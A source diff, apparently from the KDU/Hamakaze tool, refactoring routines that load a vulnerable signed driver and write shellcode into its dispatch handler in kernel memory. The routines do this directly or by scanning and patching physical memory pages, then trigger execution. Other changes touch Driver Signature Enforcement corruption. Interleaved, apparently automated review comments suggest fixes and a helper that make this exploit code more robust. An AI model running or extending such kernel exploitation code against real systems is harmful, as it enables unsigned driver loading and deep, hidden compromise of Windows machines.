+ BOOL bIoResult;
+ PKDU_PHYSMEM_ENUM_PARAMS Params = (PKDU_PHYSMEM_ENUM_PARAMS)UserContext;
- KDU_PROVIDER* prov = Context->Provider;
+ provReadPhysicalMemory ReadPhysicalMemory = Params->ReadPhysicalMemory;
+ provWritePhysicalMemory WritePhysicalMemory = Params->WritePhysicalMemory;
- //
- // If provider does not support translation return TRUE.
- //
- if ((PVOID)prov->Callbacks.VirtualToPhysical == NULL)
- return TRUE;
+ ULONG_PTR targetAddress = 0;
- dataSize = ScSizeOf(Context->ShellVersion, NULL);
+ PVOID dispatchSignature = Params->DispatchSignature;
+ ULONG signatureSize = Params->DispatchSignatureLength;
+ ULONG dispatchPageOffset = Params->DispatchHandlerPageOffset;
- memPage = (TargetAddress & 0xfffffffffffff000ull);
+ BYTE buffer[PAGE_SIZE];
+ RtlSecureZeroMemory(&buffer, sizeof(buffer));
- if (prov->Callbacks.VirtualToPhysical(Context->DeviceHandle,
- memPage,
- &physAddrStart))
+ if (ReadPhysicalMemory(Params->DeviceHandle,
+ Address,
+ &buffer,
+ PAGE_SIZE))
{
- memPage = (TargetAddress + dataSize) & 0xfffffffffffff000ull;
-
- if (prov->Callbacks.VirtualToPhysical(Context->DeviceHandle,
- memPage,
- &physAddrEnd))
+ if (signatureSize == RtlCompareMemory(dispatchSignature,
+ RtlOffsetToPointer(buffer, dispatchPageOffset),
+ signatureSize))
{
- ULONG_PTR diffAddr = physAddrEnd - physAddrStart;
+ printf_s("\t-> Found page with code at address 0x%llX\r\n", Address);
+ Params->ccPagesFound += 1;
- if (diffAddr > PAGE_SIZE)
- return FALSE;
- else
- return TRUE;
- }
+ if ((SIZE_T)dispatchPageOffset + (SIZE_T)Params->cbPayload > PAGE_SIZE) {
+
+ unsigned char jmpcode[] = { 0xe9, 0x0, 0x0, 0x0, 0x0 };
+
+ *(PULONG)&jmpcode[1] = Params->JmpAddress;
+
+ printf_s("\t--> Setting jump[%lX][%lX] at address 0x%llX\r\n",
+ jmpcode[0],
+ *(PULONG)&jmpcode[1],
+ Address + dispatchPageOffset);
+
+ bIoResult = WritePhysicalMemory(Params->DeviceHandle,
+ Address + dispatchPageOffset,
+ jmpcode,
+ sizeof(jmpcode));
+
+ if (bIoResult) {
+
+ printf_s("\t--> Memory has been modified at address 0x%llX\r\n", Address + dispatchPageOffset);
+ printf_s("\t--> Overwriting page at address 0x%llX\r\n", Address);
+
+ targetAddress = Address;
+
+ bIoResult = WritePhysicalMemory(Params->DeviceHandle,
+ targetAddress,
+ Params->pvPayload,
+ Params->cbPayload);
+
+ }
+
+ }
+ else {
+
+ targetAddress = Address + dispatchPageOffset;
+
+ bIoResult = WritePhysicalMemory(Params->DeviceHandle,
+ targetAddress,
+ Params->pvPayload,
+ Params->cbPayload);
+
+ }
+
+ if (bIoResult) {
+ Params->ccPagesModified += 1;
+ printf_s("\t--> Memory has been modified at address 0x%llX\r\n", targetAddress);
+ }
+ else {
+ supPrintfEvent(kduEventError,
+ "Could not modify memory at address 0x%llX\r\n", targetAddress);
+ }
+ }
}
+
return FALSE;
}
/*
-* KDUMapDriver
+* KDUDriverMapInit
*
* Purpose:
*
-* Run mapper.
+* Allocate shellcode structure and create sync event.
*
*/
-BOOL KDUMapDriver(
+BOOL KDUDriverMapInit(
_In_ PKDU_CONTEXT Context,
- _In_ PVOID ImageBase)
+ _In_ PVOID ImageBase,
+ _Out_ PVOID* ShellCode,
+ _Out_ PHANDLE SectionHandle,
+ _Out_ PHANDLE SyncEventHandle
+)
{
- BOOL bSuccess = FALSE;
- ULONG_PTR objectAddress, targetAddress = 0;
- FILE_OBJECT fileObject;
- DEVICE_OBJECT deviceObject;
- DRIVER_OBJECT driverObject;
-
PVOID pvShellCode;
+ HANDLE sectionHandle = NULL, readyEventHandle;
- KDU_PROVIDER* prov;
- KDU_VICTIM_PROVIDER* victimProv;
-
- ULONG retryCount = 1, maxRetry = 3;
-
- HANDLE victimDeviceHandle = NULL;
-
- FUNCTION_ENTER_MSG(__FUNCTION__);
-
- prov = Context->Provider;
- victimProv = Context->Victim;
-
-Reload:
+ *ShellCode = NULL;
+ *SectionHandle = NULL;
+ *SyncEventHandle = NULL;
- if (victimProv->SupportReload == FALSE) {
- printf_s("[+] Victim does not supports reload, max retry count set to 1\r\n");
- maxRetry = 1;
- }
+ pvShellCode = KDUSetupShellCode(Context, ImageBase, §ionHandle);
+ if (pvShellCode == NULL) {
- printf_s("[+] Victim \"%ws\" %lu acquire attempt of %lu (max)\r\n", victimProv->Name, retryCount, maxRetry);
+ supPrintfEvent(kduEventError,
+ "[!] Error while building shellcode, abort\r\n");
- //
- // If this is reload, release victim.
- //
- if (victimDeviceHandle) {
- VpRelease(victimProv, &victimDeviceHandle);
+ return FALSE;
}
- if (VpCreate(victimProv,
- Context->ModuleBase,
- &victimDeviceHandle))
- {
- printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle);
- }
- else {
+ readyEventHandle = ScCreateReadyEvent(Context->ShellVersion, pvShellCode);
+ if (readyEventHandle == NULL) {
supPrintfEvent(kduEventError,
- "[!] Could not accept victim target, GetLastError %lu\r\n", GetLastError());
-
- }
+ "[!] Error building the ready event handle, abort\r\n");
- if (supQueryObjectFromHandle(victimDeviceHandle, &objectAddress)) {
+ ScFree(pvShellCode, ScSizeOf(Context->ShellVersion, NULL));
- do {
-
- RtlSecureZeroMemory(&fileObject, sizeof(fileObject));
+ return FALSE;
+ }
- printf_s("[+] Reading FILE_OBJECT at 0x%llX\r\n", objectAddress);
+ *ShellCode = pvShellCode;
+ *SectionHandle = sectionHandle;
+ *SyncEventHandle = readyEventHandle;
- if (!KDUReadKernelVM(Context,
- objectAddress,
- &fileObject,
- sizeof(FILE_OBJECT)))
- {
+ return TRUE;
+}
- supPrintfEvent(kduEventError,
- "[!] Could not read FILE_OBJECT at 0x%llX\r\n", objectAddress);
+/*
+* KDUpMapDriverPhysicalSection
+*
+* Purpose:
+*
+* Process shellcode write through physical memory section.
+*
+*/
+BOOL KDUpMapDriverPhysicalSection(
+ _In_ PKDU_CONTEXT Context,
+ _In_ PVOID ScBuffer,
+ _In_ ULONG ScSize,
+ _In_ HANDLE ScSectionHandle,
+ _In_ HANDLE ReadyEventHandle,
+ _In_ PVICTIM_IMAGE_INFORMATION VictimImageInformation,
+ _In_ ULONG_PTR TargetAddress
+)
+{
+ BOOL bSuccess = FALSE;
+ HANDLE deviceHandle = Context->DeviceHandle;
+ HANDLE victimDeviceHandle = NULL;
+ KDU_PROVIDER* prov = Context->Provider;
+ KDU_VICTIM_PROVIDER* victimProv = Context->Victim;
- break;
- }
+ ULONG dispatchPageOffset = VictimImageInformation->DispatchPageOffset;
+ ULONG_PTR memPage, targetAddress = TargetAddress;
- printf_s("[+] Reading DEVICE_OBJECT at 0x%p\r\n", fileObject.DeviceObject);
+ provWriteKernelVM WriteKernelVM = prov->Callbacks.WriteKernelVM;
- RtlSecureZeroMemory(&deviceObject, sizeof(deviceObject));
+ do {
- if (!KDUReadKernelVM(Context,
- (ULONG_PTR)fileObject.DeviceObject,
- &deviceObject,
- sizeof(DEVICE_OBJECT)))
- {
+ if ((SIZE_T)dispatchPageOffset + (SIZE_T)ScSize > PAGE_SIZE) {
- supPrintfEvent(kduEventError,
- "[!] Could not read DEVICE_OBJECT at 0x%p\r\n", fileObject.DeviceObject);
+ memPage = (TargetAddress & 0xfffffffffffff000ull);
+ printf_s("[~] Shellcode overlaps page boundary, switching target memory address to 0x%llX\r\n", memPage);
- break;
- }
+ unsigned char jmpcode[] = { 0xe9, 0x0, 0x0, 0x0, 0x0 };
- printf_s("[+] Reading DRIVER_OBJECT at 0x%p\r\n", deviceObject.DriverObject);
+ *(PULONG)&jmpcode[1] = VictimImageInformation->JumpValue;
- RtlSecureZeroMemory(&driverObject, sizeof(driverObject));
+ printf_s("\t>> Setting jump[%lX][%lX] at address 0x%llX\r\n",
+ jmpcode[0],
+ *(PULONG)&jmpcode[1],
+ TargetAddress);
- if (!KDUReadKernelVM(Context,
- (ULONG_PTR)deviceObject.DriverObject,
- &driverObject,
- sizeof(DRIVER_OBJECT)))
- {
+ if (!WriteKernelVM(deviceHandle, TargetAddress, &jmpcode, sizeof(jmpcode))) {
supPrintfEvent(kduEventError,
- "[!] Could not read DRIVER_OBJECT at 0x%p\r\n", deviceObject.DriverObject);
+ "[!] Error writting kernel memory, abort\r\n");
break;
+
}
+ else {
- //
- // Victim handle no longer needed, can be closed.
- //
- NtClose(victimDeviceHandle);
- victimDeviceHandle = NULL;
+ targetAddress = TargetAddress - dispatchPageOffset;
- targetAddress = (ULONG_PTR)driverObject.MajorFunction[IRP_MJ_DEVICE_CONTROL];
+ }
- if (!KDUCheckMemoryLayout(Context, targetAddress)) {
+ }
- supPrintfEvent(kduEventError,
- "[!] Physical address is not within same/next page, reload victim driver\r\n");
+ //
+ // Write shellcode to kernel.
+ //
+ printf_s("[+] Writing shellcode at 0x%llX address with size 0x%lX\r\n", targetAddress, ScSize);
- retryCount += 1;
- if (retryCount > maxRetry) {
+ if (!WriteKernelVM(deviceHandle, targetAddress, ScBuffer, ScSize)) {
- supPrintfEvent(kduEventError,
- "[!] Too many attempts, abort\r\n");
+ supPrintfEvent(kduEventError,
+ "[!] Error writting kernel memory, abort\r\n");
+ break;
+ }
- break;
- }
- goto Reload;
+ //
+ // Execute shellcode.
+ //
+ printf_s("[+] Executing shellcode\r\n");
+ VpExecutePayload(victimProv, &victimDeviceHandle);
- }
+ //
+ // Wait for the shellcode to trigger the event
+ //
+ if (WaitForSingleObject(ReadyEventHandle, 2000) != WAIT_OBJECT_0) {
- printf_s("[+] Victim IRP_MJ_DEVICE_CONTROL 0x%llX\r\n", targetAddress);
- printf_s("[+] Victim DriverUnload 0x%p\r\n", driverObject.DriverUnload);
+ supPrintfEvent(kduEventError,
+ "[!] Shellcode did not trigger the event within two seconds.\r\n");
+ }
+ else
+ {
+ KDUShowPayloadResult(Context, ScSectionHandle);
bSuccess = TRUE;
+ }
- } while (FALSE);
-
- }
+ } while (FALSE);
//
// Ensure victim handle is closed.
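Review bot: In KDUPagePatchCallback the compare `RtlCompareMemory(dispatchSignature, RtlOffsetToPointer(buffer, dispatchPageOffset), signatureSize)` reads `signatureSize` bytes of the stack `buffer[PAGE_SIZE]` starting at `dispatchPageOffset`, but only the later payload write is checked against PAGE_SIZE, so an offset near the end of the page would read past the buffer; add `if ((SIZE_T)dispatchPageOffset + (SIZE_T)signatureSize > PAGE_SIZE) return FALSE;` before the read (the values come from the enumeration params, so this is presumably a sanity check rather than a live hazard, but it is cheap). In the same function, when the jump write fails `targetAddress` is still 0, so the error message at the bottom reports `0x0` rather than the address that was attempted. In KDUDriverMapInit the failure path after ScCreateReadyEvent frees the shellcode but does not close the `sectionHandle` that KDUSetupShellCode filled in; if that handle is owned by the caller at this point, add `if (sectionHandle) NtClose(sectionHandle);` before the `return FALSE;`. In KDUpMapDriverPhysicalSection, `memPage` is computed and printed as the new target but the write uses `targetAddress = TargetAddress - dispatchPageOffset`, which equals `memPage` only when the handler's in-page offset matches `dispatchPageOffset`; either write to `memPage` or log `targetAddress` so the message and the write agree. KDUpMapDriverPhysicalSection's body continues past this hunk (the victim handle cleanup and return are in the next one).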
@@ -666,293 +711,343 @@ BOOL KDUMapDriver(
victimDeviceHandle = NULL;
}
- if (bSuccess) {
-
- HANDLE sectionHandle = NULL;
-
- pvShellCode = KDUSetupShellCode(Context, ImageBase, §ionHandle);
-
- if (pvShellCode) {
-
- HANDLE readyEventHandle = ScCreateReadyEvent(Context->ShellVersion, pvShellCode);
- if (readyEventHandle) {
-
- //
- // Write shellcode to driver.
- //
- if (!prov->Callbacks.WriteKernelVM(Context->DeviceHandle,
- targetAddress,
- pvShellCode,
- ScSizeOf(Context->ShellVersion, NULL)))
- {
-
- supPrintfEvent(kduEventError,
- "[!] Error writing shellcode to the target driver, abort\r\n");
-
- bSuccess = FALSE;
- }
- else {
-
- printf_s("[+] Driver IRP_MJ_DEVICE_CONTROL handler code modified\r\n");
-
- //
- // Run shellcode.
- //
- printf_s("[+] Run shellcode\r\n");
- VpExecutePayload(victimProv, &victimDeviceHandle);
-
- //
- // Wait for the shellcode to trigger the event
- //
- if (WaitForSingleObject(readyEventHandle, 2000) != WAIT_OBJECT_0) {
-
- supPrintfEvent(kduEventError,
- "[!] Shellcode did not trigger the event within two seconds.\r\n");
-
- bSuccess = FALSE;
- }
- else
- {
- KDUShowPayloadResult(Context, sectionHandle);
- }
- }
+ return bSuccess;
+}
- CloseHandle(readyEventHandle);
+/*
+* KDUpMapDriverPhysicalBruteForce
+*
+* Purpose:
+*
+* Process shellcode write through physical memory bruteforce.
+*
+*/
+BOOL KDUpMapDriverPhysicalBruteForce(
+ _In_ PKDU_CONTEXT Context,
+ _In_ PVOID ScBuffer,
+ _In_ ULONG ScSize,
+ _In_ HANDLE ScSectionHandle,
+ _In_ HANDLE ReadyEventHandle,
+ _In_ PKDU_PHYSMEM_ENUM_PARAMS EnumParams
+)
+{
+ BOOL bSuccess = FALSE;
+ KDU_VICTIM_PROVIDER* victimProv = Context->Victim;
+ HANDLE victimDeviceHandle = NULL;
- } //readyEventHandle
- else {
+ EnumParams->bWrite = TRUE;
+ EnumParams->ccPagesFound = 0;
+ EnumParams->ccPagesModified = 0;
+ EnumParams->pvPayload = ScBuffer;
+ EnumParams->cbPayload = ScSize;
- supPrintfEvent(kduEventError,
- "[!] Error building the ready event handle, abort\r\n");
+ supPrintfEvent(kduEventInformation,
+ "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name);
- bSuccess = FALSE;
- }
+ if (supEnumeratePhysicalMemory(KDUPagePatchCallback, EnumParams)) {
- if (sectionHandle) {
- NtClose(sectionHandle);
- }
+ printf_s("[+] Number of pages found: %llu, modified: %llu\r\n",
+ EnumParams->ccPagesFound,
+ EnumParams->ccPagesModified);
- } //pvShellCode
+ //
+ // Execute shellcode.
+ //
+ printf_s("[+] Executing shellcode\r\n");
+ VpExecutePayload(victimProv, &victimDeviceHandle);
- else {
+ //
+ // Wait for the shellcode to trigger the event
+ //
+ if (WaitForSingleObject(ReadyEventHandle, 2000) != WAIT_OBJECT_0) {
supPrintfEvent(kduEventError,
- "[!] Error while building shellcode, abort\r\n");
+ "[!] Shellcode did not trigger the event within two seconds.\r\n");
- bSuccess = FALSE;
+ }
+ else
+ {
+ KDUShowPayloadResult(Context, ScSectionHandle);
+ bSuccess = TRUE;
}
- } //bSuccess
+ }
else {
-
supPrintfEvent(kduEventError,
- "[!] Error preloading victim driver, abort\r\n");
+ "[!] Failed to enumerate physical memory.\r\n");
- bSuccess = FALSE;
}
//
- // Cleanup.
+ // Ensure victim handle is closed.
//
- if (VpRelease(victimProv, &victimDeviceHandle)) {
- printf_s("[+] Victim released\r\n");
+ if (victimDeviceHandle) {
+ NtClose(victimDeviceHandle);
+ victimDeviceHandle = NULL;
}
- FUNCTION_LEAVE_MSG(__FUNCTION__);
-
return bSuccess;
}
/*
-* KDUProcExpPagePatchCallback
+* KDUpMapDriverDirectVM
*
* Purpose:
*
-* Patch ProcExp dispatch pages in physical memory.
+* Process shellcode write through direct virtual memory write primitive.
*
*/
-BOOL WINAPI KDUProcExpPagePatchCallback(
- _In_ ULONG_PTR Address,
- _In_ PVOID UserContext)
+BOOL KDUpMapDriverDirectVM(
+ _In_ PKDU_CONTEXT Context,
+ _In_ PVOID ScBuffer,
+ _In_ ULONG ScSize,
+ _In_ HANDLE ScSectionHandle,
+ _In_ HANDLE ReadyEventHandle,
+ _In_ ULONG_PTR TargetAddress
+)
{
- PKDU_PHYSMEM_ENUM_PARAMS Params = (PKDU_PHYSMEM_ENUM_PARAMS)UserContext;
- PKDU_CONTEXT Context = Params->Context;
+ BOOL bSuccess = FALSE;
+ KDU_PROVIDER* prov = Context->Provider;
+ KDU_VICTIM_PROVIDER* victimProv = Context->Victim;
+ HANDLE victimDeviceHandle = NULL;
- provReadPhysicalMemory ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
- provWritePhysicalMemory WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;
+ //
+ // Write shellcode to driver.
+ //
+ if (!prov->Callbacks.WriteKernelVM(Context->DeviceHandle,
+ TargetAddress,
+ ScBuffer,
+ ScSize))
+ {
- ULONG signatureSize = sizeof(ProcExpSignature);
+ supPrintfEvent(kduEventError,
+ "[!] Error writing shellcode to the target driver, abort\r\n");
- BYTE buffer[PAGE_SIZE];
- RtlSecureZeroMemory(&buffer, sizeof(buffer));
+ }
+ else {
- if (ReadPhysicalMemory(Context->DeviceHandle,
- Address,
- &buffer,
- PAGE_SIZE))
- {
- if (signatureSize == RtlCompareMemory(ProcExpSignature,
- RtlOffsetToPointer(buffer, PE152_DISPATCH_PAGE_OFFSET),
- signatureSize))
- {
- printf_s("\tFound page with code at address 0x%llX\r\n", Address);
- Params->ccPagesFound += 1;
+ printf_s("[+] Driver handler code modified\r\n");
- if (WritePhysicalMemory(Context->DeviceHandle,
- Address + PE152_DISPATCH_PAGE_OFFSET,
- Params->pvPayload,
- Params->cbPayload))
- {
- Params->ccPagesModified += 1;
- printf_s("\tMemory has been modified at address 0x%llX\r\n", Address + PE152_DISPATCH_PAGE_OFFSET);
- }
- else {
- supPrintfEvent(kduEventError,
- "Could not modify memory at address 0x%llX\r\n", Address + PE152_DISPATCH_PAGE_OFFSET);
- }
+ //
+ // Execute shellcode.
+ //
+ printf_s("[+] Executing shellcode\r\n");
+ VpExecutePayload(victimProv, &victimDeviceHandle);
+
+ //
+ // Wait for the shellcode to trigger the event
+ //
+ if (WaitForSingleObject(ReadyEventHandle, 2000) != WAIT_OBJECT_0) {
+
+ supPrintfEvent(kduEventError,
+ "[!] Shellcode did not trigger the event within two seconds.\r\n");
}
+ else
+ {
+ KDUShowPayloadResult(Context, ScSectionHandle);
+ bSuccess = TRUE;
+ }
}
- return FALSE;
+ //
+ // Ensure victim handle is closed.
+ //
+ if (victimDeviceHandle) {
+ NtClose(victimDeviceHandle);
+ victimDeviceHandle = NULL;
+ }
+
+ return bSuccess;
}
/*
-* KDUMapDriver2
+* KDUMapDriver
*
* Purpose:
*
-* Run mapper, using physical memory mapping.
+* Run mapper.
*
*/
-BOOL KDUMapDriver2(
+BOOL KDUMapDriver(
_In_ PKDU_CONTEXT Context,
_In_ PVOID ImageBase)
{
BOOL bSuccess = FALSE;
- KDU_PROVIDER* prov;
+ ULONG_PTR targetAddress = 0;
+ PVOID pvShellCode = NULL;
+
KDU_VICTIM_PROVIDER* victimProv;
- HANDLE victimDeviceHandle = NULL;
- PVOID pvShellCode;
+ VICTIM_IMAGE_INFORMATION vi;
+ VICTIM_DRIVER_INFORMATION vdi;
KDU_PHYSMEM_ENUM_PARAMS enumParams;
+ VICTIM_LOAD_PARAMETERS viLoadParams;
+
+ ULONG dispatchOffset = 0;
FUNCTION_ENTER_MSG(__FUNCTION__);
- prov = Context->Provider;
victimProv = Context->Victim;
- //
- // Load/open victim.
- //
- if (VpCreate(victimProv,
- Context->ModuleBase,
- &victimDeviceHandle))
- {
- printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle);
- }
- else {
-
- supPrintfEvent(kduEventError,
- "[!] Error preloading victim driver, abort\r\n");
-
- return FALSE;
- }
+ do {
- HANDLE sectionHandle = NULL;
+ viLoadParams.Provider = victimProv;
- pvShellCode = KDUSetupShellCode(Context, ImageBase, §ionHandle);
+ //
+ // Load victim driver.
+ //
+ if (VpCreate(victimProv,
+ Context->ModuleBase,
+ NULL,
+ VpLoadDriverCallback,
+ &viLoadParams))
+ {
+ printf_s("[+] Successfully loaded victim driver\r\n");
+ }
+ else {
- if (pvShellCode) {
+ supPrintfEvent(kduEventError,
+ "[!] Could not load victim target, GetLastError %lu\r\n", GetLastError());
- HANDLE readyEventHandle = ScCreateReadyEvent(Context->ShellVersion, pvShellCode);
- if (readyEventHandle) {
+ break;
- enumParams.bWrite = TRUE;
- enumParams.ccPagesFound = 0;
- enumParams.ccPagesModified = 0;
- enumParams.Context = Context;
- enumParams.pvPayload = pvShellCode;
- enumParams.cbPayload = ScSizeOf(Context->ShellVersion, NULL);
+ }
- supPrintfEvent(kduEventInformation,
- "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name);
+ //
+ // Query all required victim information.
+ //
+ RtlSecureZeroMemory(&vi, sizeof(vi));
- if (supEnumeratePhysicalMemory(KDUProcExpPagePatchCallback, &enumParams)) {
+ printf_s("[+] Query victim image information\r\n");
- printf_s("[+] Number of pages found: %llu, modified: %llu\r\n",
- enumParams.ccPagesFound,
- enumParams.ccPagesModified);
+ if (VpQueryInformation(
+ Context->Victim,
+ VictimImageInformation,
+ &vi,
+ sizeof(vi)))
+ {
+ dispatchOffset = vi.DispatchOffset;
- //
- // Run shellcode.
- //
- printf_s("[+] Run shellcode\r\n");
- VpExecutePayload(victimProv, &victimDeviceHandle);
+ RtlSecureZeroMemory(&vdi, sizeof(vdi));
- //
- // Wait for the shellcode to trigger the event
- //
- if (WaitForSingleObject(readyEventHandle, 2000) != WAIT_OBJECT_0) {
+ printf_s("[+] Query victim loaded driver layout\r\n");
- supPrintfEvent(kduEventError,
- "[!] Shellcode did not trigger the event within two seconds.\r\n");
+ if (VpQueryInformation(
+ Context->Victim,
+ VictimDriverInformation,
+ &vdi,
+ sizeof(vdi)))
+ {
- bSuccess = FALSE;
- }
- else
- {
- KDUShowPayloadResult(Context, sectionHandle);
- }
+ targetAddress = vdi.LoadedImageBase + dispatchOffset;
}
else {
+
supPrintfEvent(kduEventError,
- "[!] Failed to enumerate physical memory.\r\n");
+ "[!] Could not query victim driver layout, GetLastError %lu\r\n", GetLastError());
- bSuccess = FALSE;
+ break;
}
- CloseHandle(readyEventHandle);
-
- } //readyEventHandle
- else {
-
+ }
+ else
+ {
supPrintfEvent(kduEventError,
- "[!] Error building the ready event handle, abort\r\n");
+ "[!] Could not query victim image information, GetLastError %lu\r\n", GetLastError());
- bSuccess = FALSE;
+ break;
}
- if (sectionHandle) {
- NtClose(sectionHandle);
+ printf_s("[+] Victim target address 0x%llX\r\n", targetAddress);
+
+ HANDLE sectionHandle = NULL, readyEventHandle = NULL;
+
+ //
+ // Prepare shellcode, signal event and shared section.
+ //
+ if (!KDUDriverMapInit(Context,
+ ImageBase,
+ &pvShellCode,
+ §ionHandle,
+ &readyEventHandle))
+ {
+ break;
}
- } //pvShellCode
+ ULONG cbShellCode = ScSizeOf(Context->ShellVersion, NULL);
- else {
+ //
+ // Select proper handling depending on exploitable driver type.
+ //
+ if (Context->Provider->LoadData->PhysMemoryBruteForce) {
- supPrintfEvent(kduEventError,
- "[!] Error while building shellcode, abort\r\n");
+ //
+ // 1. Physical memory mapping via MmMapIoSpace(Ex)
+ //
+ RtlSecureZeroMemory(&enumParams, sizeof(enumParams));
- bSuccess = FALSE;
- }
+ enumParams.DeviceHandle = Context->DeviceHandle;
+ enumParams.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory;
+ enumParams.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory;
- //
- // Ensure victim handle is closed.
- //
- if (victimDeviceHandle) {
- NtClose(victimDeviceHandle);
- victimDeviceHandle = NULL;
- }
+ enumParams.DispatchSignature = Context->Victim->Data.DispatchSignature;
+ enumParams.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength;
+
+ enumParams.DispatchHandlerOffset = vi.DispatchOffset;
+ enumParams.DispatchHandlerPageOffset = vi.DispatchPageOffset;
+ enumParams.JmpAddress = vi.JumpValue;
+
+ bSuccess = KDUpMapDriverPhysicalBruteForce(Context,
+ pvShellCode,
+ cbShellCode,
+ sectionHandle,
+ readyEventHandle,
+ &enumParams);
+ }
+ else
+ if (Context->Provider->LoadData->PML4FromLowStub || Context->Provider->LoadData->PreferPhysical) {
+ //
+ // 2. Physical section access type driver with virt2phys translation available.
+ //
+ bSuccess = KDUpMapDriverPhysicalSection(Context,
+ pvShellCode,
+ cbShellCode,
+ sectionHandle,
+ readyEventHandle,
+ &vi,
+ targetAddress);
+
+ }
+ else {
+ //
+ // 3. Direct VM write primitive available.
+ //
+ bSuccess = KDUpMapDriverDirectVM(Context,
+ pvShellCode,
+ cbShellCode,
+ sectionHandle,
+ readyEventHandle,
+ targetAddress);
+
+ }
+
+ if (readyEventHandle) CloseHandle(readyEventHandle);
+ if (sectionHandle) NtClose(sectionHandle);
+
+ } while (FALSE);
//
// Cleanup.
//
- if (VpRelease(victimProv, &victimDeviceHandle)) {
+ if (VpRelease(victimProv, NULL)) {
printf_s("[+] Victim released\r\n");
}
+ if (pvShellCode)
+ ScFree(pvShellCode, ScSizeOf(Context->ShellVersion, NULL));
+
FUNCTION_LEAVE_MSG(__FUNCTION__);
return bSuccess;
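Review bot: The execute-then-wait sequence — `printf_s("[+] Executing shellcode\r\n")`, `VpExecutePayload(victimProv, &victimDeviceHandle)`, the two-second `WaitForSingleObject(ReadyEventHandle, 2000)`, `KDUShowPayloadResult` and the "Ensure victim handle is closed" block — is duplicated verbatim in KDUpMapDriverPhysicalBruteForce, in KDUpMapDriverDirectVM and in the function tail the hunk opens on, each with its own `victimDeviceHandle` local. Folding it into one static helper keeps the timeout, the error text and the handle close in a single place, and each call site shrinks to `bSuccess = KDUpExecutePayloadAndWait(Context, ScSectionHandle, ReadyEventHandle);`. Separately, the `break;` after a failed KDUDriverMapInit skips the `CloseHandle(readyEventHandle)` / `NtClose(sectionHandle)` pair at the bottom of the do-block, so if that routine can fail after creating either handle the handle is leaked — worth confirming it releases its own partial state. KDUMapDriver's closing brace lies past the end of the hunk.
```cpp
/*
* KDUpExecutePayloadAndWait
*
* Purpose:
*
* Execute the payload through the victim, wait for the ready event and show the result.
*
*/
static BOOL KDUpExecutePayloadAndWait(
    _In_ PKDU_CONTEXT Context,
    _In_ HANDLE ScSectionHandle,
    _In_ HANDLE ReadyEventHandle
)
{
    BOOL bSuccess = FALSE;
    HANDLE victimDeviceHandle = NULL;

    printf_s("[+] Executing shellcode\r\n");
    VpExecutePayload(Context->Victim, &victimDeviceHandle);

    //
    // Wait for the shellcode to trigger the event
    //
    if (WaitForSingleObject(ReadyEventHandle, 2000) != WAIT_OBJECT_0) {
        supPrintfEvent(kduEventError,
            "[!] Shellcode did not trigger the event within two seconds.\r\n");
    }
    else {
        KDUShowPayloadResult(Context, ScSectionHandle);
        bSuccess = TRUE;
    }

    //
    // Ensure victim handle is closed.
    //
    if (victimDeviceHandle) {
        NtClose(victimDeviceHandle);
        victimDeviceHandle = NULL;
    }

    return bSuccess;
}

// … in KDUpMapDriverDirectVM, the else-branch body after "[+] Driver handler code modified" becomes …
        bSuccess = KDUpExecutePayloadAndWait(Context, ScSectionHandle, ReadyEventHandle);
```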
diff --git a/Source/Hamakaze/drvmap.h b/Source/Hamakaze/drvmap.h
index 4263525..030f827 100644
--- a/Source/Hamakaze/drvmap.h
+++ b/Source/Hamakaze/drvmap.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: DRVMAP.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Prototypes and definitions for driver mapping.
*
@@ -23,10 +23,6 @@ PVOID KDUSetupShellCode(
_In_ PVOID ImageBase,
_Out_ PHANDLE SectionHandle);
-BOOL WINAPI KDUProcExpPagePatchCallback(
- _In_ ULONG_PTR Address,
- _In_ PVOID UserContext);
-
VOID KDUShowPayloadResult(
_In_ PKDU_CONTEXT Context,
_In_ HANDLE SectionHandle);
@@ -35,6 +31,6 @@ BOOL KDUMapDriver(
_In_ PKDU_CONTEXT Context,
_In_ PVOID ImageBase);
-BOOL KDUMapDriver2(
- _In_ PKDU_CONTEXT Context,
- _In_ PVOID ImageBase);
+BOOL WINAPI KDUPagePatchCallback(
+ _In_ ULONG_PTR Address,
+ _In_ PVOID UserContext);
diff --git a/Source/Hamakaze/dsefix.cpp b/Source/Hamakaze/dsefix.cpp
index c486031..e099288 100644
--- a/Source/Hamakaze/dsefix.cpp
+++ b/Source/Hamakaze/dsefix.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2022
+* (C) COPYRIGHT AUTHORS, 2014 - 2023
*
* TITLE: DSEFIX.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* CI DSE corruption related routines.
* Based on DSEFix v1.3
@@ -439,6 +439,7 @@ BOOL KDUControlDSE2(
HANDLE victimDeviceHandle = NULL;
KDU_PHYSMEM_ENUM_PARAMS enumParams;
+ VICTIM_IMAGE_INFORMATION vi;
prov = Context->Provider;
victimProv = Context->Victim;
@@ -462,7 +463,9 @@ BOOL KDUControlDSE2(
//
if (VpCreate(victimProv,
Context->ModuleBase,
- &victimDeviceHandle))
+ &victimDeviceHandle,
+ NULL,
+ NULL))
{
printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle);
}
@@ -478,29 +481,51 @@ BOOL KDUControlDSE2(
(PVOID)Address,
DSEValue);
- enumParams.bWrite = TRUE;
- enumParams.ccPagesFound = 0;
- enumParams.ccPagesModified = 0;
- enumParams.Context = Context;
- enumParams.pvPayload = shellBuffer;
- enumParams.cbPayload = (ULONG)shellSize;
+ RtlSecureZeroMemory(&vi, sizeof(vi));
- supPrintfEvent(kduEventInformation,
- "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name);
